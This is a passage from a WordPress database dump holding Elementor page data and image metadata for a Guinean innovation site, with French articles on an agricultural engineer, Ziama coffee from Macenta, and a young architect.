"elements\":[{\"id\":\"yrwmcrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"jyagbuw\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Samba Sory Camaraest un ing\\u00e9nieur agricole avec son entreprise agropastoral Business Kinyapa, il pr\\u00f4ne et pratique l\'agriculture Bio et conventionnelle.<\\/p><p>Regardez cette petite vid\\u00e9o...<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ulyp6wx\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"eqfdpa5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tudcifl\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?time_continue=16&v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1966,635,'_elementor_edit_mode','builder'),(1967,635,'_elementor_data','[{\"id\":\"muazdsg\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"yrwmcrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"jyagbuw\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Samba Sory Camaraest un ing\\u00e9nieur agricole avec son entreprise agropastoral Business Kinyapa, il pr\\u00f4ne et pratique l\'agriculture Bio et conventionnelle.\\r\\n\\r\\nRegardez cette petite vid\\u00e9o...\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ulyp6wx\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"eqfdpa5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tudcifl\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?time_continue=16&v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1968,632,'_elementor_version','0.4'),(1970,636,'_wp_attached_file','2017/10/samba.jpg'),(1971,636,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:540;s:6:\"height\";i:960;s:4:\"file\";s:17:\"2017/10/samba.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"samba-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"samba-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1972,632,'_thumbnail_id','822'),(1975,638,'_edit_last','1'),(1976,638,'_edit_lock','1509987905:1'),(1977,640,'_wp_attached_file','2017/10/cafe_ziama_macenta-679x380.jpg'),(1978,640,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:679;s:6:\"height\";i:380;s:4:\"file\";s:38:\"2017/10/cafe_ziama_macenta-679x380.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"cafe_ziama_macenta-679x380-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"cafe_ziama_macenta-679x380-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1979,641,'_wp_attached_file','2017/10/ziama.jpg'),(1980,641,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:728;s:6:\"height\";i:300;s:4:\"file\";s:17:\"2017/10/ziama.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"ziama-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"ziama-300x124.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:124;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1982,638,'post_views_count','722'),(1983,638,'_elementor_data','[{\"id\":\"wbetpkd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rmeknfg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"itwmxwk\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Le\\u00a0caf\\u00e9\\u00a0\\u2018\\u2019Ziama\\u2019\\u2019 qui porte le nom de son origine g\\u00e9ographique, est une nouvelle vari\\u00e9t\\u00e9 de qualit\\u00e9 sup\\u00e9rieure qui fait actuellement \\u00e9cho \\u00e0 travers le monde, a fait savoir le technologue du Laboratoire en caf\\u00e9iculture au Centre R\\u00e9gional de Recherche Agronomique de la Guin\\u00e9e Foresti\\u00e8re (CRRA-GF), bas\\u00e9 \\u00e0 S\\u00e9r\\u00e9dou, M. Gono-yo Traor\\u00e9, au cours d\\u2019un entretien.\\n<img class=\\\"alignnone size-medium wp-image-641\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/ziama-300x124.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"124\\\" \\/>\\nM. Traor\\u00e9 a en outre indiqu\\u00e9, que ce\\u00a0caf\\u00e9\\u00a0a \\u00e9t\\u00e9 retenu meilleur\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0de qualit\\u00e9 sup\\u00e9rieure en Guin\\u00e9e apr\\u00e8s avoir organis\\u00e9 un test de tous les\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9s<\\/a>\\u00a0produits actuellement dans les quatre r\\u00e9gions naturelles de la Guin\\u00e9e. Le \\u2018\\u2019comportement agronomique\\u2019\\u2019 du<strong>\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama li\\u00e9 \\u00e0 son go\\u00fbt aromatique, acidul\\u00e9 et peu amer, son rendement \\u00e9lev\\u00e9 \\u00e0 l\\u2019hectare, sa r\\u00e9sistance par rapport aux diff\\u00e9rentes maladies<\\/strong>, sont entre autres les crit\\u00e8res qui ont permis au Laboratoire de le classer parmi les meilleures qualit\\u00e9s en Guin\\u00e9e, a-t-il ajout\\u00e9.\\n\\nSelon toujours le technologue du Laboratoire, une \\u00e9tude comparative approfondie, r\\u00e9alis\\u00e9e par le Laboratoire au cours de l\\u2019ann\\u00e9e 2000, a \\u00e9galement permis de savoir que le massif forestier de Ziama a une grande influence sur la qualit\\u00e9 du\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u2026\\n\\nL\\u2019influence \\u00e9cologique du milieu, li\\u00e9e \\u00e0 la pluviom\\u00e9trie (9 mois et plus de pluie sur 12 mois de l\\u2019ann\\u00e9e) et \\u00e0 la v\\u00e9g\\u00e9tation verdoyante, fait que n\\u2019importe quelle qualit\\u00e9 de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0plant\\u00e9 dans le milieu peut<i>\\u00a0\\u2018\\u2019se comporter de la m\\u00eame mani\\u00e8re\\u2019\\u2019<\\/i>, a-t-il fait remarquer.\\nIl a par ailleurs, plaid\\u00e9 pour un appui technique et financier \\u00e0 l\\u2019Association des Producteurs de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">Caf\\u00e9<\\/a>\\u00a0(APC), afin que tout le processus de calibrage et de traitement de la nouvelle vari\\u00e9t\\u00e9 de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama, soit fait sur place \\u00e0 S\\u00e9r\\u00e9dou, en vue d\\u2019\\u00e9viter les cas de fraude, a ajout\\u00e9 M. Traor\\u00e9.\\n\\n<b>Le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama Macenta de Guin\\u00e9e<\\/b>, est un\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0robusta aux qualit\\u00e9s exceptionnelles, proches de celle de l\\u2019Arabica. Cultiv\\u00e9 en Guin\\u00e9e foresti\\u00e8re sur le Mont Ziama, aux confins du Liberia et de la C\\u00f4te d\\u2019Ivoire, le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>Ziama Macenta est un robusta particulier : sa saveur est acidul\\u00e9e et peu amer. Il se distingue par ses ar\\u00f4mes persistants, \\u00e0 la fois forts et fins.\\n<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\"><img class=\\\"lazyloading\\\" title=\\\"\\\" src=\\\"http:\\/\\/www.guineeconakry.info\\/typo3temp\\/pics\\/93d50eb614.gif\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" border=\\\"0\\\" \\/><\\/a>\\nLa qualit\\u00e9 de ce\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0d\\u00e9pend fortement des op\\u00e9rations de r\\u00e9colte et de post-r\\u00e9colte. Les cerises doivent \\u00eatre r\\u00e9colt\\u00e9es de mani\\u00e8re s\\u00e9lective \\u00e0 maturit\\u00e9 en trois passages. Elles sont tri\\u00e9es par trempage puis s\\u00e9ch\\u00e9es au soleil avec des remuages r\\u00e9guliers. Le s\\u00e9chage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises s\\u00e8ches sont ensuite d\\u00e9cortiqu\\u00e9es m\\u00e9caniquement en \\u00e9vitant les brisures.\\n\\nSelon de nombreux t\\u00e9moignages des anciens,\\u00a0<i>\\u00ab au temps des colons, les collecteurs passaient longtemps \\u00e0 Macenta pour augmenter la qualit\\u00e9 de leur m\\u00e9lange \\u00bb<\\/i>. Le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0de Macenta a ainsi acquis une notori\\u00e9t\\u00e9 aupr\\u00e8s des importateurs et des torr\\u00e9facteurs durant cette p\\u00e9riode. Il est encore utilis\\u00e9 aujourd\\u2019hui pour relever la base des\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9s<\\/a>\\u00a0de plus mauvaise qualit\\u00e9.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yod0201\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"yb2z3co\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1z1rg2t\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs&t=29s\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1984,642,'_elementor_edit_mode','builder'),(1985,642,'_elementor_data','[{\"id\":\"wbetpkd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rmeknfg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"itwmxwk\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Le\\u00a0caf\\u00e9\\u00a0\\u2018\\u2019Ziama\\u2019\\u2019 qui porte le nom de son origine g\\u00e9ographique, est une nouvelle vari\\u00e9t\\u00e9 de qualit\\u00e9 sup\\u00e9rieure qui fait actuellement \\u00e9cho \\u00e0 travers le monde, a fait savoir le technologue du Laboratoire en caf\\u00e9iculture au Centre R\\u00e9gional de Recherche Agronomique de la Guin\\u00e9e Foresti\\u00e8re (CRRA-GF), bas\\u00e9 \\u00e0 S\\u00e9r\\u00e9dou, M. Gono-yo Traor\\u00e9, au cours d\\u2019un entretien.\\n<img class=\\\"alignnone size-medium wp-image-641\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/ziama-300x124.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"124\\\" \\/>\\nM. Traor\\u00e9 a en outre indiqu\\u00e9, que ce\\u00a0caf\\u00e9\\u00a0a \\u00e9t\\u00e9 retenu meilleur\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0de qualit\\u00e9 sup\\u00e9rieure en Guin\\u00e9e apr\\u00e8s avoir organis\\u00e9 un test de tous les\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9s<\\/a>\\u00a0produits actuellement dans les quatre r\\u00e9gions naturelles de la Guin\\u00e9e. Le \\u2018\\u2019comportement agronomique\\u2019\\u2019 du<strong>\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama li\\u00e9 \\u00e0 son go\\u00fbt aromatique, acidul\\u00e9 et peu amer, son rendement \\u00e9lev\\u00e9 \\u00e0 l\\u2019hectare, sa r\\u00e9sistance par rapport aux diff\\u00e9rentes maladies<\\/strong>, sont entre autres les crit\\u00e8res qui ont permis au Laboratoire de le classer parmi les meilleures qualit\\u00e9s en Guin\\u00e9e, a-t-il ajout\\u00e9.\\n\\nSelon toujours le technologue du Laboratoire, une \\u00e9tude comparative approfondie, r\\u00e9alis\\u00e9e par le Laboratoire au cours de l\\u2019ann\\u00e9e 2000, a \\u00e9galement permis de savoir que le massif forestier de Ziama a une grande influence sur la qualit\\u00e9 du\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u2026\\n\\nL\\u2019influence \\u00e9cologique du milieu, li\\u00e9e \\u00e0 la pluviom\\u00e9trie (9 mois et plus de pluie sur 12 mois de l\\u2019ann\\u00e9e) et \\u00e0 la v\\u00e9g\\u00e9tation verdoyante, fait que n\\u2019importe quelle qualit\\u00e9 de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0plant\\u00e9 dans le milieu peut<i>\\u00a0\\u2018\\u2019se comporter de la m\\u00eame mani\\u00e8re\\u2019\\u2019<\\/i>, a-t-il fait remarquer.\\nIl a par ailleurs, plaid\\u00e9 pour un appui technique et financier \\u00e0 l\\u2019Association des Producteurs de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">Caf\\u00e9<\\/a>\\u00a0(APC), afin que tout le processus de calibrage et de traitement de la nouvelle vari\\u00e9t\\u00e9 de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama, soit fait sur place \\u00e0 S\\u00e9r\\u00e9dou, en vue d\\u2019\\u00e9viter les cas de fraude, a ajout\\u00e9 M. Traor\\u00e9.\\n\\n<b>Le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama Macenta de Guin\\u00e9e<\\/b>, est un\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0robusta aux qualit\\u00e9s exceptionnelles, proches de celle de l\\u2019Arabica. Cultiv\\u00e9 en Guin\\u00e9e foresti\\u00e8re sur le Mont Ziama, aux confins du Liberia et de la C\\u00f4te d\\u2019Ivoire, le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>Ziama Macenta est un robusta particulier : sa saveur est acidul\\u00e9e et peu amer. Il se distingue par ses ar\\u00f4mes persistants, \\u00e0 la fois forts et fins.\\n<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\"><img class=\\\"lazyloading\\\" title=\\\"\\\" src=\\\"http:\\/\\/www.guineeconakry.info\\/typo3temp\\/pics\\/93d50eb614.gif\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" border=\\\"0\\\" \\/><\\/a>\\nLa qualit\\u00e9 de ce\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0d\\u00e9pend fortement des op\\u00e9rations de r\\u00e9colte et de post-r\\u00e9colte. Les cerises doivent \\u00eatre r\\u00e9colt\\u00e9es de mani\\u00e8re s\\u00e9lective \\u00e0 maturit\\u00e9 en trois passages. Elles sont tri\\u00e9es par trempage puis s\\u00e9ch\\u00e9es au soleil avec des remuages r\\u00e9guliers. Le s\\u00e9chage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises s\\u00e8ches sont ensuite d\\u00e9cortiqu\\u00e9es m\\u00e9caniquement en \\u00e9vitant les brisures.\\n\\nSelon de nombreux t\\u00e9moignages des anciens,\\u00a0<i>\\u00ab au temps des colons, les collecteurs passaient longtemps \\u00e0 Macenta pour augmenter la qualit\\u00e9 de leur m\\u00e9lange \\u00bb<\\/i>. Le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0de Macenta a ainsi acquis une notori\\u00e9t\\u00e9 aupr\\u00e8s des importateurs et des torr\\u00e9facteurs durant cette p\\u00e9riode. Il est encore utilis\\u00e9 aujourd\\u2019hui pour relever la base des\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9s<\\/a>\\u00a0de plus mauvaise qualit\\u00e9.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yod0201\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"yb2z3co\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1z1rg2t\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs&t=29s\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1986,638,'_elementor_version','0.4'),(1987,638,'_wp_page_template','default'),(1990,638,'_elementor_css','a:3:{s:4:\"time\";i:1509027473;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1991,638,'_thumbnail_id','640'),(2004,649,'_wp_attached_file','2017/10/2.jpg'),(2005,649,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:13:\"2017/10/2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2006,650,'_wp_attached_file','2017/10/3.jpg'),(2007,650,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:13:\"2017/10/3.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2008,651,'_wp_attached_file','2017/10/4.jpg'),(2009,651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:13:\"2017/10/4.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2010,652,'_wp_attached_file','2017/10/6.jpg'),(2011,652,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:13:\"2017/10/6.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"6-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2012,653,'_wp_attached_file','2017/10/6-1.jpg'),(2013,653,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:15:\"2017/10/6-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"6-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"6-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2014,416,'_elementor_data','[{\"id\":\"euubokk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bkemspx\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"khcjseg\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone size-medium wp-image-417\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte-300x169.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"169\\\" \\/><\\/p><p>Moustapha Haidara est un jeune architecte Guin\\u00e9en, consid\\u00e9r\\u00e9 par ses pairs comme le meilleur de tous. Il a cr\\u00e9e un concept de maison particuli\\u00e8rement innovant ayant des caract\\u00e9ristiques particuli\\u00e8re:<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7jptpz6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rkl0mp3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"usnd9qg\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":417,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte.jpg\"},{\"id\":651,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/4.jpg\"},{\"id\":650,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/3.jpg\"},{\"id\":649,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/2.jpg\"},{\"id\":652,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6.jpg\"},{\"id\":653,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6-1.jpg\"}],\"thumbnail_size\":\"medium_large\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ivvdi0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1uy6ay8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"k5k2nxn\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>-<strong>Toit en 